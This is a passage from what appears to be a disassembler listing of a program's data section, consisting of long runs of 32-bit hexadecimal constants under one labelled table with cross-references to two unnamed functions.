		dd 1984FDE0h, 21F3EAA2h, 0A2D16A66h, 16D837D0h,	31815E6Dh
		dd 0E933D5A7h, 3042FB46h, 0F850DAA8h, 0FB802711h, 0F70046DCh
		dd 0AEE4DBD1h, 0B47BADE3h, 29B8E552h, 0A64D2230h, 0D77082F3h
		dd 1A9C7654h, 562D19A5h, 8BFDE2C6h, 72AF7D00h, 5D413EDDh
		dd 5D1A3991h, 970FD3EFh, 6BD57A14h, 0D1D9CFDFh,	0BD24E2E2h
		dd 4D1AE2EDh, 20807D73h, 0C5FFB361h, 0B5E7EA7Fh, 34DF743Fh
		dd 46709011h, 4C2EB85Ah, 0E2B6F014h, 0CA32B703h, 0D1F7E77Ah
		dd 7075253Bh, 523BE348h, 9F07EBF2h, 85AFB9CEh, 0C9D98B10h
		dd 0CDB0C0D4h, 4D03EEB0h, 2DA3D98h, 0EFC2C3E7h,	666AD44Fh
		dd 0C1BECF5Fh, 0FD44DCF5h, 0C125C2F9h, 0F1CC9A43h, 0F6A51735h
		dd 39244A7Eh, 593ADE4Ah
		dd 53A4A9D8h, 6A29C1F8h, 953B3C2h, 9467EAC7h, 0B975C29Eh
		dd 0BD87303Ch, 0C4D5AA7Fh, 0AA18E23Bh, 0A4F2D0D1h, 64B87EF8h
		dd 3AD264C5h, 0B478855Dh, 41B519C2h, 0C1F2704Ah, 0D4FD635Dh
		dd 9952C741h, 8A33D259h, 0DEBA72DFh, 0D134FA45h, 9FD66D7Eh
		dd 0F157840Ah, 24DD88A2h, 0E80CA528h, 91025CEAh, 0A63071A0h
		dd 300226E8h, 0D1F22AE9h, 0FE9EA2F2h, 2D9A968Ch, 0D489E0E6h
		dd 0A737A280h, 0B3DAFE19h, 6F6C84AAh, 5DE38DA3h, 5D99EDD8h
		dd 0F87AE217h, 0CC0D718Bh, 3E4F1C2Bh, 8DDAFCDh,	7568AB70h
		dd 0FC7D047Ch, 0F3D69EA5h, 0FA28EC2Ch, 5F008D9Eh, 0A3831C9Fh
		dd 0F3782252h, 946C473h, 0D986DD7Ah, 1FBF6477h,	1F49B40Fh
		dd 72CD884Ah, 20C1E515h, 52142239h, 5A73FB4h, 0A649A23Fh
		dd 0D66BDEB8h, 258238B9h, 85F04AD1h, 50558D58h,	0ED1C7850h
		dd 5A06F676h, 9137AA2Fh, 5B21BF0Eh, 10FA590Ch, 0C6D5AF98h
		dd 89A22790h, 8AD87D9Bh, 742FAA1Dh, 0E517A879h,	0FFD7BFD7h
		dd 0AC2ECE6Dh, 945226FEh, 5DB58EC0h, 13DBB5E8h,	0BA2C2DD5h
		dd 0F1B991DEh, 4510A54Dh, 0F25DBABBh, 2661DA9Bh, 1AE8730h
		dd 564996A1h, 0C1F05CC0h, 1715CAC5h, 4CE73FDBh,	0B99AD612h
		dd 0ADF05D55h, 8890314Eh, 839AF432h, 0DC5A6E62h, 9E5A0FE4h
		dd 0B240EA73h, 0EAFD8405h, 3A0A24DFh, 2D0D3236h, 0FF49719Dh
		dd 0FB7F1A2Ch, 0E8CA5D8Eh, 0C37E9283h, 0AE2C1E03h, 71BC9982h
		dd 0F17205A7h, 1C720F03h, 0FDEE8E57h, 46A2A27Eh, 0DE19A716h
		dd 0AD81AB52h, 25F873A2h, 0A363F86Ah, 0D6B2EBADh, 0F83DCA69h
		dd 0DE2A7CE1h, 0D9A77AF9h, 1A0A8436h, 2FDC5223h, 4A63AC0Eh
		dd 0BDDDFA01h, 0FC7380Ah, 2A52C43Fh, 0A23358CBh, 58F0EAB5h
		dd 364ED3D6h, 69B43DEEh, 3AFBA321h, 0E554B4EEh,	2234DC6Eh
		dd 0AB935CCDh, 1F58F700h, 5AE14A61h, 4C5061BDh,	559808F2h
		dd 615F6874h, 0CDECD815h, 0E90661F2h, 81E8AD18h, 0BC48E613h
		dd 0CE2045E0h, 5C37702Ch, 9C1FF0FCh, 0C7A3223Ch, 0EBFF6A84h
		dd 8AA56D31h, 0CB8B715h, 3F0CCA68h, 6E383F31h, 0DDF71D55h
		dd 15B43661h, 1DDAC72Ah, 22F8EA52h, 10FD9D03h, 2323EE24h
		dd 124AB452h, 0D24F7542h, 0DF0EFDA8h, 3B61DE07h, 51FC9BDFh
		dd 217379FDh, 0AF9C5434h, 34628D9Ah, 0FD44E37Fh, 0F9F88781h
		dd 0EB78B5D6h, 0E1F4B0C6h, 5B573A2Fh, 2896E3BCh, 842340D4h
		dd 0C2369DF1h, 0F87CBA5Dh, 0FBD6E77Dh, 19E62D9Dh, 6AFF1ABAh
		dd 0F7707DAh, 1C2D5225h, 0AD0C4FA0h, 0DD461E6Fh, 0C4154BBBh
		dd 0C5F0EA48h, 33774A7h, 61C0B2FDh, 3CE8FA85h, 0B7CF5A2h
		dd 954FBDA4h, 67E59AD5h, 0F3E7C692h, 0FE6D57BDh, 0F9768DEh
		dd 0EAE9D53Ch, 8F9A6751h, 97FF1BA0h, 0FE50E29Ah, 0F7E8A8C5h
		dd 91D41DD7h, 0A0615FD5h, 0D56562B9h, 6E341F81h, 0AAC5C15Bh
		dd 0D347D9E5h, 8BA7017Eh, 7562AFEBh, 7EC7BD05h,	0D48716AAh
		dd 0BAD79AEFh, 0E79AE338h, 0C0F92113h, 0EB7CCE9Dh, 0ED900B37h
		dd 0AC1A7C60h, 429F9980h, 8A62C2BBh, 7BDF8E3Dh,	0DF70B993h
		dd 2DCA71C2h, 0FC2F00A6h, 3D592B25h, 0DE2173B5h, 35B1C6C5h
		dd 53EFF808h, 18BC5F04h, 0F01CF08h, 0E142AB17h,	0F88DDB8Ch
		dd 4331A2C7h, 0D68E3979h, 0D6596B7Ch, 397EECDFh, 0D5487E5Fh
		dd 0C7813C7Fh, 66DF32D3h, 0C9D85882h, 59B7BD39h, 0EB56FDAFh
		dd 11155BDEh, 31762A75h, 215EDEE5h, 7C364924h, 80CC0670h
		dd 5C992235h, 568EDA32h, 0BC35D791h, 36EC285Ch,	57EF8CEFh
		dd 56B7E4FAh, 0D99C6DD2h, 9DE3ED76h, 709C0607h,	54D795EBh
		dd 1C8C1E34h, 9AC3BAEFh, 0AB84D28Bh, 2153F4F7h,	79B3F622h
		dd 7ED4B46Ch, 2FEA6C9Bh, 0A8702E1Ch, 963D093Dh,	0FC47585Dh
		dd 0BC183070h, 0D9C26E80h, 0F1E7772h, 0E4285B8Eh, 0ED593587h
		dd 44CBE05Ch, 0BE38AC68h, 0EC4F6430h, 44230EE4h, 0E132410h
		dd 0B47234E7h, 536E1D1h, 0EA30634Bh, 71BF09EDh,	10DCE4CDh
		dd 66EE55ADh, 5AE8F57Eh, 0CA7E0BDFh, 0FEDAF61Eh, 9E022625h
		dd 568584Dh, 3313961Eh,	0BC99F751h, 20BF56B6h, 7C9B5C95h
		dd 7A202269h, 5495A808h, 0BA0F31D9h, 769755CAh,	50B303F7h
		dd 7E0A80A2h, 72692FC1h, 0C6628686h, 44257186h,	280C57C9h
		dd 39156FC7h, 2D3B91D9h, 0F63FB29Bh, 1099521Ch,	7F1A9DCDh
		dd 555100AEh, 0FB47E818h, 51BFAF35h, 1BEA7B57h,	225FBB7Dh
		dd 0A5746EF2h, 0F9FAEF0Fh, 0F6543705h, 981C7D14h, 7DB6091Eh
		dd 0F485DAAAh, 909F529Fh, 0B36FF09Eh, 9F510F1Ah, 0DFC90F89h
		dd 633B13FDh, 51732870h, 5568907Bh, 8768A6E5h, 1E4D342Fh
		dd 0FE7BD4E1h, 1F544935h, 14C833E0h, 5E9E533Ah,	2B9B0A25h
		dd 3B2AECF1h, 58EB480Fh, 1B9D5832h, 0A6E03FFh, 3A84BAF2h
		dd 0F575640Ch, 0B5B5B372h, 73DDA512h, 6D99DD71h, 57E4EB2Bh
		dd 5BE13C25h, 0D087E939h, 0BB77AB45h, 366E7116h, 0D2411D46h
		dd 1113DCF0h, 0B26B36D9h, 43D0A8C8h, 450CFBA0h,	8ACD5F39h
		dd 5CC04505h, 0FDB46DE3h, 169D236Ch, 0A8AA34EEh, 0E7FB60B3h
		dd 8B4D7F37h, 61BDC30Dh, 0D89EBD52h, 1EB16896h,	0CFBC07C1h
		dd 8D3F6965h, 0BF842B99h, 766DA62Fh, 5A208A2Eh,	1E933594h
		dd 0E1D7FC67h, 28DE9B13h, 1CBBDD41h, 1B0AC329h,	8B00876Eh
		dd 0F2C32315h, 0FDAAA5FBh, 37ED5993h, 51EC94BDh, 1C842C97h
		dd 25370A41h, 76DD8763h, 0B0B51ABAh, 3433E53Fh,	91CB6CE2h
		dd 4A543012h, 0DFD8A237h, 62707313h, 0C9B53FE1h, 1315790Ah
		dd 87DABA45h, 0FD20231Ah, 49C04FBCh, 9B8DAB23h,	48F2F9AAh
		dd 0C5EECD15h, 0EB3D49F9h, 8C9E8716h, 0CC668DA8h, 0B47A451Ah
		dd 313EFF4Ah, 444B4E36h, 0C50FFA9Bh, 0EC20086Bh, 0DB97C5D9h
		dd 6A709C4Bh, 0FED1C0F1h, 0D2ED8D15h, 34FABCBBh, 0D572B0FCh
		dd 25B250FEh, 0F992BB17h, 0DC1E748Dh, 3F6FDFAh,	6D1E3443h
		dd 9DF1AE6Eh, 8264018Ch, 73B6FEAFh, 0A6AD50F3h,	27BF21FFh
		dd 80F7F6EEh, 0C5ACB66Ch, 0B454936h, 2AC74A99h,	46A6AF31h
		dd 0CCA8AED6h, 37FC2D3Bh, 0FA41666Ch, 0C568CC4Bh, 868D642Fh
		dd 0B5D186AFh, 0A37BA6B4h, 8EB1BECCh, 41D5AA36h, 5FAB5C56h
		dd 71F164Ch, 0C1F21316h, 452C12A0h, 0FDD38E23h,	285F8A91h
		dd 0D1DBF05Ah, 0D9743AFDh, 0FCAB0CC3h, 4D0318E2h, 0EAC92517h
		dd 13595F9Ah, 0C8F8CEAFh, 12A901D2h, 2836351h, 0AB2EDFE7h
		dd 0E961D49Eh, 77254AE6h, 597BC2BFh, 76154AAEh,	64D3E6ABh
		dd 0F5DB63B1h, 15020BACh, 74C05F5Ah, 7D39A641h,	5469F0BCh
		dd 0DFAEEDB5h, 4C0CA27h, 38E3A321h, 0D58EF273h,	0BCE6A82h
		dd 0D749DB52h, 0B896B4FFh, 1B3675C6h, 4BF6122Ah, 6C7C8BE7h
		dd 79DA51B3h, 0EBDC1412h, 8BB9E095h, 0B7539FC0h, 0FBF0CD57h
		dd 8885139Fh, 7ECDA9DCh, 0B89F980Bh, 70AE8862h,	3968D431h
		dd 7AEF0F9Eh, 82933C57h, 28E0CCA7h, 73EBE18Dh, 0BDB37C2Fh
		dd 73B43F7h, 0C780A83Ch, 316B099h, 0D3D4925Ch, 86AC3129h
		dd 0EEA1DC7h, 592DCC55h, 2E9AD6A0h, 0E63B9555h,	0D0C1048h
		dd 0BD0881C5h, 3A745C79h, 0C89D0D4Fh, 0AA478AABh, 1C79F122h
		dd 80C31AEh, 0AA227F19h, 0CA2F6F25h, 0C363AFA1h, 0E079E2FAh
		dd 666226DCh, 944CDAD9h, 77B3EEDh, 9EA128D2h, 709A8DA8h
		dd 0F92C7CDDh, 774FE1B7h, 0DD6B0F03h, 0F8ABD36Bh, 177206CEh
		dd 0E63AF0FCh, 0A04D6EA1h, 80AE104Bh, 94D61587h, 0FAF69AEEh
		dd 0C45FE287h, 0D05BAA8Bh, 987E03C8h, 0DDC265D1h, 0C65520D3h
		dd 0BBB3C345h, 0D1DB3AE3h
		dd 8811B9E5h, 529C669Eh, 92183A3Dh, 663A9CAh, 7522AD40h
		dd 7CC7DE05h, 7E5FC810h, 269C0BE0h, 0A67F68BFh,	0E2E9AEF1h
		dd 5AA5A4CBh, 9F2F948Ch, 6923AA3Bh, 0E37D74BEh,	0FE0D86B8h
		dd 430FF82Ah, 1D61B6E3h, 2235C05Ah, 16A7537Fh, 9F46F676h
		dd 553BB889h, 568527F0h, 5A08DBCEh, 4F6981A8h, 0DE5BCC56h
		dd 0AC4BB4D4h, 139CD181h, 135E6C5Ch, 36AB425Ah,	0DB9E1ACEh
		dd 47077905h, 475614E7h, 0E86ECBABh, 0C51A114Ah, 15AD35Fh
		dd 0F6A575DAh, 4A8F9729h, 672B1DEBh, 61EBDFC3h,	3FB20AD7h
		dd 9535F68Fh, 0D7A9065Ch, 2085C5FBh, 2433C5D6h,	0C5E91EBFh
		dd 4F56B80Bh, 0AF695115h, 6E9D0285h, 0D73F0307h, 0C0092926h
		dd 0C770BABAh, 958AC1E1h, 51A3CB9h, 54783D31h, 31C0F485h
		dd 5A204B1Eh, 2C2184A9h, 8F49F43Ah, 0F3C5D52Fh,	0CABB4541h
		dd 6DF7FCB5h, 0A522D3h,	0BD72AABCh, 7E07F6B8h, 0E85BD7FDh
		dd 0F6C49518h, 44CCF3CEh, 0BF017BCBh, 0D17FE0EFh, 474BECCAh
		dd 0D7AC751Bh, 0DAE88DE1h, 0FEAE4E9Ch, 3E4934D5h, 0D5A3F8B3h
		dd 8D72D06Ch, 0AB704B13h, 98119653h, 934A5EC4h,	839171D6h
		dd 0CE2E5774h, 6DD06891h, 0BF5731C0h, 34FFEF21h, 42F85C2Ah
		dd 6C5FCED8h, 9AD16735h, 0DAABDD4Fh, 91CC80B1h,	0D1E9EF5Bh
		dd 2A340F9Fh, 9797C7DEh, 8D9CACCAh, 7EE287E9h, 73D91450h
		dd 7D0ACAB0h, 25484125h, 0DC966CC4h, 377016C8h,	1CFE253Ah
		dd 71CC2EFFh, 0D70FF079h, 931A4B98h, 0C9CDC86Fh, 0D5C9C0F1h
		dd 0EE1C0CEBh, 1DEC66A7h, 6F61EE3Bh, 72EFD528h,	0F13DF56Dh
		dd 32214B83h, 0D89FB4CDh, 14F363ABh, 5259E144h,	0BB1322B0h
		dd 8F7005D5h, 0FC0FFDD5h, 47AB7DB0h, 0B7007F07h, 0AFB4E7C3h
		dd 8EB5B054h, 0CC048B61h, 0E781FDDCh, 0D97B6D17h, 0ABDB2D28h
		dd 3F15A780h, 69ACE25Ah, 1E5A3D76h, 0EC04A8FAh,	0ECB47FDEh
		dd 5D5A9051h, 71021EB2h, 8E87C2EAh, 0CF84D78Dh,	598E34Bh
		dd 0ED002E7Ah, 74F82FDCh, 21CFA8B1h, 0ED4CB3A4h, 0EE44074Eh
		dd 5C3252E3h, 30994C8h,	550513C9h, 0D097F9D5h, 24177AD1h
		dd 8E04AB56h, 6C8A38ABh, 46F705FEh, 78441AF4h, 1E143368h
		dd 0F1152E17h, 8EC32B46h, 934D6DCBh, 4BF1B914h,	1DD245A2h
		dd 64C6F3ECh, 0A6821183h, 8CB4E246h, 0B81C653Bh, 9505977Fh
		dd 0B712CC8h, 95A243C0h, 0D06C3D80h, 6316DC3h, 8F2C0BA0h
		dd 0BA21A3Bh, 0F1C0EA0Dh, 0FD06165Bh, 0EFEBB9Fh, 4A07073Fh
		dd 0C82E9931h, 59D6E307h, 107711BDh, 0F4AA260Bh, 9C168B92h
		dd 7FD2A692h, 0F0BC88CEh, 0A9F806AEh, 0BF11AFF3h, 274D0ECCh
		dd 0C5C1BEDAh, 0AB6F5B92h, 4AB56C8Ah, 260034F2h, 0E5033276h
		dd 0DF055911h, 8106E707h, 12EB91FAh, 77242FD9h,	0B9F1BF05h
		dd 0C3AB500Bh, 30C1E084h, 2B5F0636h, 532B74Ah, 15A7277h
		dd 0F5C525F4h, 0CFBDC74Ah, 2FC7459h, 539B16ABh,	63336D76h
		dd 0AC969D97h, 155FE44Bh, 3E6C8D9h, 532C25F3h, 0DCDE2A06h
		dd 8DD86F68h, 0CA5BE964h, 6D6CE5C6h, 81B208DDh,	769B9137h
		dd 448CF063h, 57CF05C3h, 0A2F06980h, 99B12C4Ah,	0C3E07591h
		dd 4BDE2567h, 0B1D97E11h, 4DFDEE36h, 0AB751902h, 49C5BAD7h
		dd 54694F23h, 0B87E9161h, 98094C91h, 36110F9Dh,	2123CE0Fh
		dd 0A8C133F8h, 5760A462h, 0FC1F9311h, 0ABFB94CAh, 6A7DF9F6h
		dd 67DAC0DAh, 9BD5DED2h, 6F5F7D21h, 0D359F690h,	9D3E7D66h
		dd 65E2F77Bh, 0F38619B3h, 0A6ED712Bh, 0C36917ABh, 985AD8CBh
		dd 5E1E607Fh, 8A8ABE51h, 24AA6BE4h, 0DD7C893Ch,	0F5A5830Dh
		dd 3CD74F68h, 2D9AA1CAh, 84AB22BBh, 5E3EFB77h, 4495FD46h
		dd 5F7215D5h, 129930BEh, 0A093846Dh, 0BCBACEFBh, 5D566ED6h
		dd 7C692FD3h, 5359061Ah, 4FA67FA7h, 56786B7Dh, 75DE80C5h
		dd 3E8C6D59h, 9BEA2530h, 7E496D2Ch, 7E455198h, 208548E9h
		dd 0E8D81B15h, 209C86C9h, 966A3EDDh, 0EFDA3569h, 0EE944303h
		dd 4FACC1E8h, 5BFD472Eh, 0B7C25F02h, 689A6CBEh,	34436DE9h
		dd 1A0A5DA0h, 2EDAA35Ah, 0A7DE649Eh, 6CABED68h,	0A7FAC65Eh
		dd 0C74BB7B2h, 0E7CCF4D8h, 198BDDBEh, 713A03C7h, 2EA610AAh
		dd 0EBD38010h, 0B25155ACh, 53B5356Fh, 0A56E1A09h, 1B4306Ah
		dd 0A245DD0h, 87FF73D8h, 16883B73h, 457038Eh, 0A475A1B1h
		dd 6EB9D82Eh, 76A85548h, 2584CF9Bh, 3BD2122Bh, 559789Fh
		dd 0B50FB99Bh, 0A46A8FCEh, 0A36C076h, 54D7C988h, 77680A65h
		dd 0D07EA9D4h, 9EBBEDF2h, 0DF29EDF3h, 67DB7599h, 0F669EF46h
		dd 30D818FDh, 3714C113h, 4ED3838Eh, 0EB72A050h,	0CA42AF5Dh
		dd 9A9D27B5h, 0E32A15A5h, 2485D287h, 133D72D1h,	0C4A6F1ADh
		dd 0E522AE0Bh, 36BFA99Fh, 37C07FB5h, 0AF4BBF62h, 0A7F9B476h
		dd 651BB6Fh, 0E6E4AAC9h, 0C32A48C6h, 75AE17F2h,	5C1E406Bh
		dd 509C4FEh, 7C317BA2h,	5C4191E0h, 4E85F3BCh, 0BB397E0Eh
		dd 64EB82FBh, 0F107360Fh, 0E1B91F9Eh, 7F9ACF99h, 388BA1DAh
		dd 4E82D9Ch, 938770F7h,	59B9DFD9h, 8DBD7790h, 0A7F99DC0h
		dd 82D46AC0h, 36CB5F8Dh, 0D68ABD49h, 6E37E82Ah,	0EED0C2EFh
		dd 0D3E04A46h, 6DB5690Bh, 5FD77CF3h, 9852672Eh,	0FF670E3Bh
		dd 0E17EC4F1h, 3E71595Eh, 0D1641E8Fh, 0F24D7A26h, 68BF732Bh
		dd 5D45AB23h, 0A1F842A6h, 0DD4756A1h, 448F289Dh, 99D826CAh
		dd 0FF3FFBA0h, 39197E2Ah, 275970A5h, 855AA68Eh,	8352606Bh
		dd 0B54AE07Eh, 167FC3B9h, 21D4E322h, 3436ED87h,	0B23040B9h
		dd 5C16BC2Fh, 75D747EEh, 8FC10CA3h, 39772A3Bh, 5AC4588Fh
		dd 9EAE7B46h, 34D8B870h, 0BFC3C3FEh, 8AE2ECBAh,	0E1483DF0h
		dd 86FE6576h, 53C1D9DDh, 4A924963h, 0B894B91Bh,	1D43966Dh
		dd 12B4C065h, 21AB6C9Ch, 0E733ABC0h, 0C0A6463Fh, 2F32D8AFh
		dd 8F8A5773h, 0C1F9858Ch, 0E5FED30Fh, 30BDB501h, 306B9AFFh
		dd 0EB0764BBh, 0FA7346CFh, 0AC606E6Bh, 13CF1EA2h, 78E41C8Eh
		dd 0F831299Ch, 0C250287Dh, 0DC53FA87h, 6E3726B0h, 0D02EAC2Bh
		dd 2D789115h, 30E2FF63h, 6EEF39EFh, 0BA12B44Ah,	0D2ACC130h
		dd 0CE99824Bh, 0C0468D07h, 3FA11DE8h, 9AECE319h, 1C9DFE90h
		dd 0B7288BEAh, 95396B4Bh, 4C3DFA6Dh, 37CEF74Eh,	0ABF0FCF5h
		dd 0AAFC150Ah, 3C8D74C6h, 97BBCB44h, 0D2F715FEh, 0BFC337C9h
		dd 2F1441C8h, 2DB2AEABh, 0DC2C2D8h, 32AB1268h, 90868299h
		dd 172C3A62h, 985AF36Bh, 5EDE1932h, 0A97D0419h,	0B672A995h
		dd 0BE6BC50Ah, 18C5D13Ch, 0BA239744h, 7BE77DD3h, 91D1F619h
		dd 47929DD5h, 902AD40Dh, 0F079B260h, 11EEC68Eh,	61B26E86h
		dd 58937AAEh, 6B9E8264h, 33B1A072h, 5451FFA3h, 0D3980CE8h
		dd 0F1E9B3BCh, 731ADC66h, 7C49D4D0h, 0F89A88A2h, 2C3847E1h
		dd 632AB594h, 30A83EF5h, 0BB55206Ah, 9960F99Eh,	0F10B97ADh
		dd 0B6B3CB07h, 0A3BDE77h, 682EC461h, 62DF19B6h,	3805CFF6h
		dd 0D409EA2Dh, 0B1426F36h, 644C6676h, 232FCEh, 0E101186Ah
		dd 48BA5B4Ah, 0E1944003h, 209030CAh, 94030CCh, 251994A5h
		dd 3827D288h, 980A22C0h, 0D23E35DBh, 6061F867h,	0F2AF568h
		dd 0B75C1BCCh, 0B80FA127h, 0D82BE07Eh, 0D82D4263h, 0EF54C806h
		dd 8EE2F266h, 0C57CD469h, 0EA82C5A2h, 575D412h,	0DCF05689h
		dd 3EFD66D6h, 295F9452h, 0B21398B7h, 34D3EC14h,	2CEA5B19h
		dd 0CEF6B70Ch, 0DF7EE25Dh, 1BBE6267h, 0AEEB1616h, 0DECAA901h
		dd 0FB754012h, 0D63658F7h, 8C2E2ADBh, 53A40B8Bh, 8AEB0775h
		dd 8FE3A345h, 0FD728262h
		dd 819A09A6h, 503FA679h, 3CBB8525h, 0FEDB72E3h,	0B6D3323Dh
		dd 15BC431Fh, 42453D37h, 331733A8h, 94635F47h, 458CDF57h
		dd 9A50908Bh, 7C5CA2A1h, 4940E2Ah, 9B8BAAD7h, 0CEEB7D7Fh
		dd 0A6B74D8Fh, 4780C297h, 0A08336AFh, 377FF307h, 0D7B25C82h
		dd 5E6C5976h, 0B13BBC45h, 0B875A69Ah, 0FF82B67Bh, 2D5017CCh
		dd 0D71EA48Ch, 80AD7691h, 0FC6DC8Bh, 0D1CF3C3h,	0B0205B69h
		dd 23EAD27Bh, 587D773h,	5D974A5Bh, 2028E08Ah, 8107D80Dh
		dd 1646BAEh, 8577B3F6h,	8DF6AF4h, 0F16EFD2h, 3A1F59BEh
		dd 4A49240Bh, 0B445B137h, 0F86F534Ch, 1BB34F41h, 7EF8A71Eh
		dd 71906922h, 0FC67E23h, 0BA590BCCh, 7818AB15h,	4C194BFEh
		dd 0F6A3080Eh, 67836A76h, 74123D90h, 1DDFD225h,	97111955h
		dd 0E3573053h, 551D87E3h, 0BA11D0B8h, 0AADACE0Fh, 2900F772h
		dd 974DFCCFh, 0D687167h, 15CC9E40h, 3031E59Dh, 0D55BEA15h
		dd 0ED88FA41h, 168F4C87h, 16B4BA12h, 0D8E60AAFh, 2B1B224Ah
		dd 5DA36216h, 0FF3B8C44h, 40D1BD0h, 7457DC1Eh, 47137565h
		dd 1CDDA079h, 57F16555h, 0B7559D9Ah, 0EE9AC0FEh, 77031F7Ah
		dd 11AD9571h, 0F413315Eh, 30501BD2h, 0B600EAEDh, 5D73B887h
		dd 0D500E32Dh, 0BDF752BAh, 0BB2368B5h, 0E0F22206h, 3B4507D0h
		dd 573122F5h, 0DC0577B2h, 0F3705B14h, 61790E77h, 0B4981AFEh
dword_474244	dd 766EC03Bh, 75666F7Bh, 89DE02F9h, 1122F6B6h, 0DC727953h
					; DATA XREF: sub_43D823+E971o
					; sub_45A4C1-235Co
		dd 8E565535h, 17B15319h, 0A0BF796Ah, 2DDF54BEh,	159A680Ch
		dd 0C5A030Fh, 51612319h, 0C2E918F8h, 3D81183Bh,	0A3936158h
		dd 381F18BAh, 97C6F35h,	0A863B7BBh, 8B2D7A8h, 8AEDF914h
		dd 443EE87Ah, 0A4DCE491h, 0EBF70EA7h, 5D5881B3h, 1AEE75F8h
		dd 53341E7Dh, 6D3CF578h, 57675B1Dh, 0F9C14720h,	0E512865Bh
		dd 477F1AAh, 22BF4CADh,	0FE4B71Eh, 5FE11411h, 6B26765Eh
		dd 158A98E9h, 7B9045FCh, 0F805BFA9h, 15C58441h,	0B71FC467h
		dd 79EC4CCh, 135D6C14h,	3868BBA4h, 5E34EC33h, 7144C41Ah
		dd 0DD6FAE55h, 26C6DC63h, 0BF717658h, 8ED66740h, 0E0F14A39h
		dd 1297E710h, 0CE98E3B8h, 2501FB4Eh, 492CFADBh,	61B030D1h
		dd 6BE5615Eh, 3738B733h, 9D6DD270h, 70DA9942h, 0D90DD3CAh
		dd 9614A11Dh, 4F76632Dh, 129F569Ch, 7E6C5146h, 0C6272516h
		dd 0F09FD267h, 0ED11FAE0h, 69050D2Bh, 724D0D44h, 0B6A0DE75h
		dd 678BAE6Dh, 0AAFBAFDCh, 0BE7D2F3Ah, 9D5D8BFCh, 0BDC16D5Eh
		dd 209EA140h, 786808C6h, 3321B1D4h, 17E15F08h, 5090189Ah
		dd 0F83D7538h, 0FB8247Dh, 0CB2388BFh, 88B01D30h, 0FEC04C94h
		dd 0EBBF8BE9h, 81E059DEh, 742BD52Dh, 8CCF7AE4h,	0BABF862Ch
		dd 61A0A5F7h, 0B0BB6D47h, 182CE10Ah, 0B0294037h, 70257196h
		dd 9F7AA066h, 6E687B97h, 0B9A2B3ACh, 389EBA99h,	9DB6AB5Ah
		dd 12B02FC3h, 0DBE12D7Ch, 76581495h, 0A4B5CFF6h, 8FABA259h
		dd 0E763EE9Dh, 0C2FE4D04h, 0A38FC1F7h, 0D2896A01h, 0D2FF380Eh
		dd 69D36AD0h, 73800E1Ch, 8B607D31h, 0D93D2B50h,	0FC37E30h
		dd 17828B55h, 747D6CD7h, 0AA5FF897h, 0BE6FB03Dh, 0AEE9D6C4h
		dd 957C593Dh, 0FC82DC2Ah, 7F86A9D1h, 0C5FA2B39h, 0E42DD5AAh
		dd 851A1EDBh, 774F18BBh, 65C93B58h, 0D063CE0h, 37AA4DE6h
		dd 2466536Bh, 0C582BA9Eh, 43696556h, 0AE9247C7h, 0BE5FF7A9h
		dd 1ADCC312h, 0E06BDF8Bh, 3AC96DF4h, 0BF233D88h, 0DB5BDDD7h
		dd 0ED914F04h, 2160757h, 0C3FFD626h, 0B4965750h, 0F0F95FC1h
		dd 0EBFC779Ah, 0F28ED1ACh, 3F8C8B86h, 0A43B351h, 7F0F5531h
		dd 85DE9BAAh, 0B061EE5Fh, 0EDE2E973h, 7544332Fh, 7CA9E2D8h
		dd 7BBABBDDh, 0B45A5A24h, 5FEC4D8Eh, 0AB62A71h,	0A39A8A18h
		dd 0BB5FBE55h, 0ED626F3Dh, 22DC9EB3h, 3437C2E1h, 0AD151E34h
		dd 47804A40h, 914C691Dh, 59BEAA32h, 90880FDEh, 0B157D3E2h
		dd 0EB0121E0h, 15D53520h, 7ADBD3Eh, 8DCF25FFh, 7BD4C4AFh
		dd 0A85B8CAFh, 4AA1489Ah, 0A1987821h, 0D7F4B714h, 0D982A07Fh
		dd 1DFEE3ACh, 73B88AB5h, 8C1CB9C3h, 0EB62A509h,	9BB2A34Eh
		dd 5DC319B5h, 7B736FEFh, 0D4B4F148h, 122A0768h,	84493CCBh
		dd 6811AEA1h, 95FC5D42h, 0FD0662B4h, 4DA359FBh,	79DDA88Ch
		dd 679B5D10h, 0D1002155h, 3B5711F6h, 2251D6ABh,	0A035589Dh
		dd 0BED96D7Ah, 42D5F181h, 5CFD356Bh, 8C1A5669h,	0BDDAB652h
		dd 32D08C03h, 0B55D3401h, 0EE62A27Fh, 0B9D68128h, 0CABC9C1Bh
		dd 29E031B2h, 0EEABCF45h, 0E3A32B57h, 0BAC08C14h, 8AAEC1E2h
		dd 43F03676h, 0A342F27Bh, 0B815BD8Dh, 581635BAh, 0E67BDCBFh
		dd 8DAADE57h, 9F1299AAh, 55123A5Ch, 0F2D0B736h,	5373C697h
		dd 64E317AFh, 30F8D26Bh, 0F0426078h, 2A198939h,	5B1EE786h
		dd 81F1A301h, 0FD09FB87h, 53F84236h, 4EC2E8B2h,	0FC0FE870h
		dd 5AA5607Eh, 60414AE9h, 0C377C765h, 1D6ED7EAh,	0ADEFE9h
		dd 45C295D9h, 0FBC0C5EDh, 0D0FCC0BCh, 0D51BE931h, 3DD6676Dh
		dd 99440694h, 0CE9F89A6h, 0B0A6D6CAh, 0B8BFE173h, 3CE0010h
		dd 0B5F79D6Fh, 373B8161h, 5ECF65FDh, 76DD174Eh,	6F9C24EDh
		dd 7FB03F94h, 79D57B14h, 37A506FFh, 0A47266D1h,	0EFC3AA12h
		dd 61553B0Bh, 0FAD8F117h, 0E9D5ACC6h, 18B3127Bh, 0E4894DD6h
		dd 4F7F9F30h, 388B7104h, 0D3B6B750h, 9915A51Fh,	1DCCA55Ch
		dd 690292CBh, 0BB7276D6h, 6F7A8666h, 118B53E7h,	0DC5D19DCh
		dd 8B1399B7h, 666D6541h, 67260F96h, 551710EAh, 46E052BEh
		dd 32C993Fh, 0EEC1B40Bh, 927AFF7Ch, 1769295Dh, 7EFBDE4Bh
		dd 825DC056h, 0DCCFA105h, 156761F8h, 0ABEB8C13h, 70B7D8F5h
		dd 6B325950h, 3E0A6110h, 75B310FBh, 3F44FD92h, 0B5FB503Ch
		dd 0C5363F71h, 1A2831F9h, 0C95CB40Fh, 0FAC4C396h, 9A22D8E2h
		dd 9925D7C9h, 0BAB862D1h, 12516986h, 0F7D129Ch,	667C451Eh
		dd 0E052767h, 0DFB1D965h, 3F37E4BAh, 7E0476D6h,	0F6516A31h
		dd 1BE1F6C3h, 0DF0F78FCh, 0BABD7A14h, 1F9DE7C8h, 0FC7C3F60h
		dd 45BAACD6h, 0A4361BCh, 0DA6D6C0Fh, 92CE3785h,	9E1B1B1Eh
